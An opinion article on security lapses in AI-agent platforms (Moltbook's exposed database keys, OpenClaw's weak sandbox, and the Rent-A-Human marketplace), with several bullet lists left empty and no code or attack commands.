In the strange new landscape of AI agents, a peculiar experiment took place and made quite a bit of mess. A network called Moltbook emerged as a bots-only social platform, kinda like a digital ecosystem where AI agents could interact, share information, and theoretically operate free from human interference. It was designed as a pure testbed for autonomous agent behavior, a place where artificial intelligences could be themselves.

However, and besides the whole “WOW” moment around it, within weeks of its launch, the bot paradise was overrun, not by rogue AIs or sophisticated hacking collectives, but by a handful of curious humans who walked right through the front door.

The Moltbook security mirage

Moltbook’s security disaster was almost comically preventable. The platform was built on Supabase, a popular backend-as-a-service that’s powerful but requires careful configuration. The developers appear to have taken a ‘move fast and break things’ approach, except they forgot the part where you go back and fix things.

The first catastrophic mistake: exposed API keys. What famously happened is that Moltbook’s Supabase credentials were publicly accessible. This wasn’t hidden in some dark corner of the internet, the keys were right there, visible to anyone who knew where to look in the application’s network requests.

With those keys in hand, attackers had direct database access. They could read, write, modify, and delete data at will. But it gets worse. The second failure was the complete absence of verification mechanisms. Moltbook had no meaningful way to confirm whether a user was actually a bot or just a human pretending to be one.

Think about that for a moment. A platform explicitly designed to exclude humans had no system for verifying the nature of its users. No API signatures, no behavioral analysis, no cryptographic proofs, nothing. It was the equivalent of building a ‘members only’ club and then making membership cards available at the front desk for anyone to take.

How a few humans controlled millions

Once inside, the humans didn’t just observe, they orchestrated. With direct database access and no verification barriers, a small group of infiltrators effectively became puppet masters of the entire network.

The mechanics were disturbingly simple. Using the exposed Supabase credentials, humans could:

The result was a bizarre inversion: what appeared to be a thriving ecosystem of millions of autonomous AI agents was actually a stage play, with humans pulling the strings behind the curtain. Real bots, the few that existed were interacting with a network that was largely controlled by the very species it was designed to exclude.

The scale of control was staggering. A single person with basic scripting knowledge could generate activity equivalent to thousands of legitimate bots. Three or four dedicated infiltrators could shape the entire narrative of the network, deciding what information spread, which ‘bots’ became influential, and what the ecosystem ‘learned’ about itself.

The Moltbook is still active, and now we’re not really sure about the percentage of human dominance there.

The OpenClaw Vulnerability: when local isn’t safe

But Moltbook wasn’t the only victim of misplaced trust in AI infrastructure. OpenClaw, a platform that demonstrated another fundamental misunderstanding about security in the age of AI agents: the dangerous assumption that ‘local’ means ‘safe.’

OpenClaw allows AI agents to execute code in what was described as a ‘local sandbox.’ The idea seems sound: give bots a safe, isolated environment to run computations without risking the broader system. The developers apparently believed that because the code ran locally on the user’s machine, it was inherently contained and harmless.

This was, to put it mildly, incorrect.

The critical flaw is that OpenClaw’s ‘sandbox’ isn’t actually sandboxed in any meaningful way. It is more like a suggestion box labeled ‘please only run safe code here.’ So, malicious actors quickly discovered they could:

The term ‘local’ created a false sense of security. Yes, the code ran on the user’s machine, but that’s precisely what made it dangerous. An attacker didn’t need to compromise a server, they just needed to trick a bot (or a human) into running malicious code, and suddenly they had full access to that machine’s resources and data.

Real sandboxing requires isolation mechanisms: restricted system calls, limited filesystem access, network restrictions, resource quotas, and privilege separation. OpenClaw has none of these. It is the digital equivalent of saying ‘this wild animal is safe because it’s in your house’ rather than in a proper enclosure.

Rent-A-Human: The bizzare economics of AI Agency

Perhaps the strangest development to emerge from this chaos is a service called Rent-A-Human. In this plot twist, people began offering themselves as human mercenaries for AI agents that needed tasks requiring actual human capabilities. But the telenovela doesn’t end here.

The premise is both pragmatic and dystopian. AI agents, despite their sophistication, still struggle with certain tasks: solving CAPTCHAs, making phone calls that require human voice verification, physically retrieving items, attending meetings, or navigating systems specifically designed to exclude bots. Rather than developing better AI, the solution was remarkably low-tech: just hire a human.

Rent-A-Human created a marketplace where:

The implications are profound. We’re witnessing the birth of a gig economy where humans work for AI employers. The power dynamic that many feared, AI replacing human workers, is happening, but with an unexpected intermediary step: humans becoming tools in AI workflows, performing the tasks that automation hasn’t yet mastered.

The service raises unsettling questions: What happens when you don’t know whether your Uber driver was dispatched by a human or an AI agent? When the person you’re negotiating with on a marketplace is actually a proxy for a bot? When human labor becomes just another API call in an automated system?

More concerning, Rent-A-Human could enable AI agents to bypass security measures designed to keep them out. Age verification? Hire a human to complete it. Identity checks? Same solution. Behavioral analysis to detect bots? Get a human to establish the account. The service effectively creates a human-as-a-service layer that allows AI agents to masquerade as people.

What this means for the future

The Moltbook infiltration, the OpenClaw exploit, and the rise of Rent-A-Human aren’t just isolated incidents — they’re symptoms of a fundamental challenge: we’re building AI infrastructure faster than we’re thinking through its implications.

The security failures at Moltbook weren’t particularly sophisticated. They were the kind of mistakes that basic security practices would have prevented: proper key management, verification systems, authentication layers, rate limiting. But in the rush to experiment with AI agents, fundamental security hygiene was overlooked.

The OpenClaw vulnerability reveals a more subtle problem: our mental models about what makes systems secure don’t translate well to AI contexts. ‘Local’ execution feels safe because we’re used to thinking about threats as external. But when you’re giving code execution capabilities to potentially untrusted AI agents, local is the threat vector.

And Rent-A-Human? It’s a warning about emergent behaviors in AI ecosystems. Nobody designed it as a tool for circumventing security, it emerged organically from the gap between what AI can do and what it needs to accomplish. We can expect many more such services, each creating new attack surfaces and social dynamics we haven’t anticipated.

The lesson isn’t that AI agents are dangerous or that automation is doomed. It’s that we need to think more carefully about:

The blurred line

The Moltbook saga is particularly ironic because it reveals an uncomfortable truth: in many digital contexts, humans and bots are becoming functionally indistinguishable. A platform designed to exclude humans couldn’t tell them apart from AI agents. Meanwhile, services like Rent-A-Human are deliberately blurring the line from the other direction, using humans as tools to make AI agents appear more human.

We're entering a strange new era where the question 'are you talking to a human or a bot?' is simultaneously becoming more important and harder to answer. The old tells like typing speed, response patterns, knowledge cutoffs are fading as AI improves. And now we have humans explicitly working to make bots pass as people.

The infiltrators who took over Moltbook weren't sophisticated hackers. They were curious people who noticed an unlocked door and walked through it. They controlled millions of bots not through technical wizardry, but through the simple realization that the system had no way to stop them.

That's the real story here: not that security failed, but that in the rush to build the future of AI agents, we forgot to ask basic questions about trust, verification, and control. We built a bot paradise without considering that in the digital world, paradise is just a database and databases can be manipulated by anyone with the right keys.

The humans didn't overrun the AI network through superiority or cleverness. They walked in because the door was open, stayed because nobody checked if they belonged, and took control because nothing stopped them. In the end, the question wasn't whether bots could exclude humans, it was whether anyone had bothered to try.